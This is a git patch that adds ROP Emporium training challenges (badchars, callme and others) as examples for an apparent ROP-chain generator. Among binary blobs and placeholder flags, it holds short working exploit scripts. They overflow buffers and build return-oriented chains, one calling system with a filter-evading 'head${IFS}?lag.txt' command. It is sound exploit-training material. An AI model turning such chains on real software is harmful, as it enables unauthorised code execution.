From dc3737b616fd4947878b25a4e01ac3f4aff2f187 Mon Sep 17 00:00:00 2001
From: n0psledbyte <n0psledbyte@gmail.com>
Date: Thu, 6 Feb 2020 22:07:08 +0700
Subject: [PATCH] add rop emporium example

---
 examples/rop_emporium/badchars/badchars       | Bin 0 -> 9416 bytes
 examples/rop_emporium/badchars/exploit.py     |  17 ++++++++
 examples/rop_emporium/badchars/flag.txt       |   1 +
 examples/rop_emporium/callme/callme           | Bin 0 -> 13360 bytes
 .../rop_emporium/callme/encrypted_flag.txt    |   1 +
 examples/rop_emporium/callme/exploit.py       |  22 +++++++++++
 examples/rop_emporium/callme/key1.dat         |   2 +
 examples/rop_emporium/callme/key2.dat         |   1 +
 examples/rop_emporium/callme/libcallme.so     | Bin 0 -> 8584 bytes
 examples/rop_emporium/fluff/exploit.py        |  16 ++++++++
 examples/rop_emporium/fluff/flag.txt          |   1 +
 examples/rop_emporium/fluff/fluff             | Bin 0 -> 9144 bytes
 examples/rop_emporium/pivot/exploit.py        |  37 ++++++++++++++++++
 examples/rop_emporium/pivot/flag.txt          |   1 +
 examples/rop_emporium/pivot/libpivot.so       | Bin 0 -> 8680 bytes
 examples/rop_emporium/pivot/pivot             | Bin 0 -> 13384 bytes
 examples/rop_emporium/split/exploit.py        |  16 ++++++++
 examples/rop_emporium/split/flag.txt          |   1 +
 examples/rop_emporium/split/split             | Bin 0 -> 9128 bytes
 examples/rop_emporium/write4/exploit.py       |  17 ++++++++
 examples/rop_emporium/write4/flag.txt         |   1 +
 examples/rop_emporium/write4/write4           | Bin 0 -> 9136 bytes
 22 files changed, 134 insertions(+)
 create mode 100755 examples/rop_emporium/badchars/badchars
 create mode 100644 examples/rop_emporium/badchars/exploit.py
 create mode 100644 examples/rop_emporium/badchars/flag.txt
 create mode 100755 examples/rop_emporium/callme/callme
 create mode 100644 examples/rop_emporium/callme/encrypted_flag.txt
 create mode 100644 examples/rop_emporium/callme/exploit.py
 create mode 100644 examples/rop_emporium/callme/key1.dat
 create mode 100644 examples/rop_emporium/callme/key2.dat
 create mode 100755 examples/rop_emporium/callme/libcallme.so
 create mode 100644 examples/rop_emporium/fluff/exploit.py
 create mode 100644 examples/rop_emporium/fluff/flag.txt
 create mode 100755 examples/rop_emporium/fluff/fluff
 create mode 100644 examples/rop_emporium/pivot/exploit.py
 create mode 100644 examples/rop_emporium/pivot/flag.txt
 create mode 100755 examples/rop_emporium/pivot/libpivot.so
 create mode 100755 examples/rop_emporium/pivot/pivot
 create mode 100644 examples/rop_emporium/split/exploit.py
 create mode 100644 examples/rop_emporium/split/flag.txt
 create mode 100755 examples/rop_emporium/split/split
 create mode 100644 examples/rop_emporium/write4/exploit.py
 create mode 100644 examples/rop_emporium/write4/flag.txt
 create mode 100755 examples/rop_emporium/write4/write4

diff --git a/examples/rop_emporium/badchars/badchars b/examples/rop_emporium/badchars/badchars
new file mode 100755
index 0000000000000000000000000000000000000000..6a1f2a7d915a4353ee8af6746d412d312cf63bc3
GIT binary patch
literal 9416
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

literal 0
HcmV?d00001

diff --git a/examples/rop_emporium/badchars/exploit.py b/examples/rop_emporium/badchars/exploit.py
new file mode 100644
index 0000000..a42c6f9
--- /dev/null
+++ b/examples/rop_emporium/badchars/exploit.py
@@ -0,0 +1,17 @@
+from Exrop import Exrop
+from pwn import *
+
+binname = "./badchars"
+rop = Exrop(binname)
+rop.find_gadgets(cache=True)
+elf = ELF("./badchars", checksec=False)
+system = elf.symbols['system']
+print("system @ {:08x}".format(system))
+chain = rop.func_call(system, ("head${IFS}?lag.txt", 0), elf.bss()) # hack to avoid badchar
+#chain.dump()
+buf  = b"A"*40
+payload = buf + chain.payload_str()
+p = process("./badchars")
+p.recv(1024)
+p.sendline(payload)
+p.interactive()
diff --git a/examples/rop_emporium/badchars/flag.txt b/examples/rop_emporium/badchars/flag.txt
new file mode 100644
index 0000000..918aaf6
--- /dev/null
+++ b/examples/rop_emporium/badchars/flag.txt
@@ -0,0 +1 @@
+ROPE{a_placeholder_32byte_flag!}
diff --git a/examples/rop_emporium/callme/callme b/examples/rop_emporium/callme/callme
new file mode 100755
index 0000000000000000000000000000000000000000..cd67444746c26e6217cc9c946ef711338ea545e8
GIT binary patch
literal 13360
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
O{(Gw}f44*F?El~S_R{+R

literal 0
HcmV?d00001

diff --git a/examples/rop_emporium/callme/encrypted_flag.txt b/examples/rop_emporium/callme/encrypted_flag.txt
new file mode 100644
index 0000000..1823337
--- /dev/null
+++ b/examples/rop_emporium/callme/encrypted_flag.txt
@@ -0,0 +1 @@
+SMSA~gXxekhieactt`L''tnl|E}p|y>]!
diff --git a/examples/rop_emporium/callme/exploit.py b/examples/rop_emporium/callme/exploit.py
new file mode 100644
index 0000000..ec46633
--- /dev/null
+++ b/examples/rop_emporium/callme/exploit.py
@@ -0,0 +1,22 @@
+from pwn import *
+from Exrop import Exrop
+
+binname = "./callme"
+p = process(binname)
+elf = ELF(binname)
+callme_one = elf.symbols['callme_one']
+callme_two = elf.symbols['callme_two']
+callme_three = elf.symbols['callme_three']
+rop = Exrop(binname)
+rop.find_gadgets(cache=True)
+chain1 = rop.func_call(callme_one, (1,2,3))
+chain1.dump()
+chain2 = rop.func_call(callme_two, (1,2,3))
+chain2.dump()
+chain3 = rop.func_call(callme_three, (1,2,3))
+chain3.dump()
+buf = b"A"*0x28
+rop = chain1.payload_str() + chain2.payload_str() + chain3.payload_str()
+pay = buf + rop
+p.sendlineafter("> ", pay)
+p.interactive()
diff --git a/examples/rop_emporium/callme/key1.dat b/examples/rop_emporium/callme/key1.dat
new file mode 100644
index 0000000..1f221cf
--- /dev/null
+++ b/examples/rop_emporium/callme/key1.dat
@@ -0,0 +1,2 @@
+
	
+

\ No newline at end of file
diff --git a/examples/rop_emporium/callme/key2.dat b/examples/rop_emporium/callme/key2.dat
new file mode 100644
index 0000000..5551322
--- /dev/null
+++ b/examples/rop_emporium/callme/key2.dat
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/examples/rop_emporium/callme/libcallme.so b/examples/rop_emporium/callme/libcallme.so
new file mode 100755
index 0000000000000000000000000000000000000000..398dac92ebc20b2a9ce0a06f2318f44408ae1f29
GIT binary patch
literal 8584
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
